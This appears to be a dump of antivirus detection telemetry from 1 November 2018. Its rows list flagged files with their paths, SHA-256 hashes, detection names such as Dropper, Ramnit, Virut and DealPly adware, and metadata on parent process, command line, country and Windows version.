  Row(detection=Row(filename='15d48ced869114d974cd56c0999a6cf81b73fcf3e3806558be64d94187d42536', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\15D48CED869114D974CD56C0999A6CF81B73FCF3E3806558BE64D94187D42536', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='15d48ced869114d974cd56c0999a6cf81b73fcf3e3806558be64d94187d42536', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:23:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='16092afeddb2d200125835637bebf7872659f749c0c14de8d6a2fd1c039ccf46', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-20.categorizing\\16092AFEDDB2D200125835637BEBF7872659F749C0C14DE8D6A2FD1C039CCF46', filesize=1280000, name='HEUR/AGEN.1029502.#M1.#R1'), hash='16092afeddb2d200125835637bebf7872659f749c0c14de8d6a2fd1c039ccf46', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T08:26:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='keyhook64.dll', filepath='C:\\Windows\\KeyHook64.dll', filesize=3484000, name='TR/Bandios.ulkkx.#M1.#R1'), hash='16159b5fe91e89cc5ef9bbac6ef6ff8a1d4f4b7ce00b1b0195e5f7fda9329853', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T02:55:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='keyhook64.dll', filepath='C:\\Windows\\KeyHook64.dll', filesize=3484000, name='TR/Bandios.ulkkx.#M1.#R1'), hash='16159b5fe91e89cc5ef9bbac6ef6ff8a1d4f4b7ce00b1b0195e5f7fda9329853', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:55:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-105707-dfb3e284', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5602ca49\\AVSCAN-20181101-105616-D8A2F2C2\\AVSCAN-20181101-105707-DFB3E284', filesize=3484000, name='TR/Bandios.ulkkx.#M1.#R1'), hash='16159b5fe91e89cc5ef9bbac6ef6ff8a1d4f4b7ce00b1b0195e5f7fda9329853', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:57:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gcaclientdll.dll', filepath='C:\\Program Files (x86)\\Garena Plus\\Room\\gcaclientdll.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='166cc02d31acea15ad5a0af21e30e3363b43fb5f611b2ad2bf76d8f50a746b89', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T16:31:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1677b5dc4ce578fefca6de41d259ec5a667843a5e36bbf2dbd5f5acc634f2497', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\1677B5DC4CE578FEFCA6DE41D259EC5A667843A5E36BBF2DBD5F5ACC634F2497', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1677b5dc4ce578fefca6de41d259ec5a667843a5e36bbf2dbd5f5acc634f2497', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:13:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='emboxui.exe', filepath='c:\\users\\X\\appdata\\local\\temp\\rar$exa12120.1415\\[danielniewold] embox\\emboxui.exe', filesize=10176000, name='HEUR/APC.#M1.#R1'), hash='1680e6f44bc0684691d7eebd1c1597c9c78c8e5bd021f3131a4e1b721298812c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=2240728, timestamp='2018-11-01T20:43:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1687483a29c55e00b2e6b3f69b81db32acf7df9c79b07a83f3f72067d84ebb31', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-21.categorizing\\1687483A29C55E00B2E6B3F69B81DB32ACF7DF9C79B07A83F3F72067D84EBB31', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1687483a29c55e00b2e6b3f69b81db32acf7df9c79b07a83f3f72067d84ebb31', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T06:37:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-091440-c57c5c42', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0325020e\\AVSCAN-20181101-090025-3A08BDB6\\AVSCAN-20181101-091440-C57C5C42', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='16a61ab5efdcec33d71663b07bf20c1347ddc30ee8329c18722b9a75b12e5e08', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:15:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='16c977ca644806d602791e55439706c73477ae11663d05c4ae4202e95da5ae70', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T06:14:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=6144000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='16ce47ce1092f08d97948956c7ff57c947de13c9df6b8a0d96f2dbcff3f5d02f', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T17:57:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-214451-cb97e904', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_632bd233\\AVSCAN-20181101-214038-A3F4827E\\AVSCAN-20181101-214451-CB97E904', filesize=636000, name='TR/Agent.636000.#M1.#R1'), hash='171d1dfca3f708019564709e16775a3ddde7cd1778de81ca080281020af6a16d', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T19:44:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='c02rm52.htm', filepath='\\\\?\\C:\\Windows.old\\Users\\win7\\AppData\\Local\\VirtualStore\\Program Files (x86)\\Adobe\\PageMaker 7.0\\RSRC\\USENGLSH\\Help\\c02rm52.htm', filesize=384000, name='W32/Chir.B.#M1.#R1'), hash='177d8dae85e091242be9a52657b12d23e7329af9493b951b8c8904782f7a427d', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:47:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='skse_loader.exe', filepath='C:\\Users\\X\\Desktop\\Ablage\\skse_1_06_16\\skse_loader.exe', filesize=192000, name='W32/Ramnit.CD.#M1.#R1'), hash='17e26c7fc5bae6864a898278a4229b223706b7e2ab7b7ab543f0d06c46223503', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:m7q6Ck3JIUCADdP8.1', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T09:46:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp1989859\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/restart \\\\\\/minimized \\\\\\/froma', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3721032, timestamp='2018-11-01T05:31:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp6306390\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:58:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp5180272\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/ads:1 \\\\\\/mnl', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Baixaki_java-se-development-kit_2459879894.exe', parentsize=2202824, timestamp='2018-11-01T01:58:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp6306390\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/mnl', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Baixaki_Windows Movie Maker_3348995344.exe', parentsize=2202824, timestamp='2018-11-01T00:58:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-234534-31e7e894', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9be25e36\\AVSCAN-20181031-232508-97335948\\AVSCAN-20181031-234534-31E7E894', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T06:45:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp10628173\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\plants-vs-zombies_3771639024.exe', parentsize=2488056, timestamp='2018-11-01T19:19:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-210506-19cb03e3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_579e1550\\AVSCAN-20181031-210339-10A15C0C\\AVSCAN-20181031-210506-19CB03E3', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T00:04:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7071800\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YyhwYgxaFRAiP211FM5W \\\\\\/mnl', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='E:\\documentos\\Desktop\\Baixaki_itunes_1135567989.exe', parentsize=2202824, timestamp='2018-11-01T03:57:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7071800\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T03:57:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp4414197\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='CA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:23:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp9143283\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3811144, timestamp='2018-11-01T18:19:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp9143283\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:aYJvfBrnHVJ\\\\\\/n3hkq\\\\\\/s \\\\\\/mnl', country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\installer_microsoft_excel (1).exe', parentsize=2526136, timestamp='2018-11-01T18:19:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-211216-46c54769', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_579e1550\\AVSCAN-20181031-210339-10A15C0C\\AVSCAN-20181031-211216-46C54769', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T00:12:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp9143283\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:19:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-211104-3f2d7831', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_579e1550\\AVSCAN-20181031-210339-10A15C0C\\AVSCAN-20181031-211104-3F2D7831', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T00:10:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp5187480\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/mnl', country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\installer_atube_catcher.exe', parentsize=2526136, timestamp='2018-11-01T18:04:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp9143283\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:aYJvfBrnHVJ\\\\\\/n3hkq\\\\\\/s \\\\\\/mnl', country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\installer_microsoft_excel (1).exe', parentsize=2526136, timestamp='2018-11-01T18:19:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp1538366\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\Desktop\\optifine-1.13.exe', parentsize=2537352, timestamp='2018-11-01T14:42:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp1514315\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YyhwYgxaFRAiP211FM5W \\\\\\/mnl', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\microsoft-powerpoint-2010_3839443743.exe', parentsize=2395416, timestamp='2018-11-01T01:45:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp2366891\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/ads:1 \\\\\\/mnl', country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\gta-san-andreas-programas-gratis-net_1433065135.exe', parentsize=2308292, timestamp='2018-11-01T01:12:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-190934-68f84bd2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d93eb456\\AVSCAN-20181101-190334-3F223839\\AVSCAN-20181101-190934-68F84BD2', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='UY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:09:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp2266368\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:T3RNZyFaKB9EbHY2 \\\\\\/mnl', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Programs\\Adobe Premiere Pro CC 2018 12.1.1.10 Full Version_2009304831.exe', parentsize=2409021, timestamp='2018-11-01T14:48:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp2366891\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T01:12:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7047220\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\mx-vs-atv-reflex_4097053454.exe', parentsize=2418296, timestamp='2018-11-01T06:32:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp2081432\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T00:21:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-183645-84b74198', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9ce689a0\\AVSCAN-20181101-183432-716FC92E\\AVSCAN-20181101-183645-84B74198', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:36:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp2081432\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YyhwYgxaFRAiP211FM5W \\\\\\/mnl', country='CL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\insidious-programas-gratis-net_0307176659.exe', parentsize=2308292, timestamp='2018-11-01T00:21:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp3242375\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:07:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp2432763\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/mnl', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\slitherio (4).exe', parentsize=2400760, timestamp='2018-11-01T17:00:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp2948169\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/ads:1 \\\\\\/mnl', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\JavaSetup_0346492589.exe', parentsize=2399158, timestamp='2018-11-01T15:05:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-210659-25a142ec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_579e1550\\AVSCAN-20181031-210339-10A15C0C\\AVSCAN-20181031-210659-25A142EC', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T00:06:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-210737-298f2cd0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_579e1550\\AVSCAN-20181031-210339-10A15C0C\\AVSCAN-20181031-210737-298F2CD0', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T00:07:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-210734-294b91fd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_579e1550\\AVSCAN-20181031-210339-10A15C0C\\AVSCAN-20181031-210734-294B91FD', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T00:07:27Z'), dt=datetime.date(2018, 11, 1)),
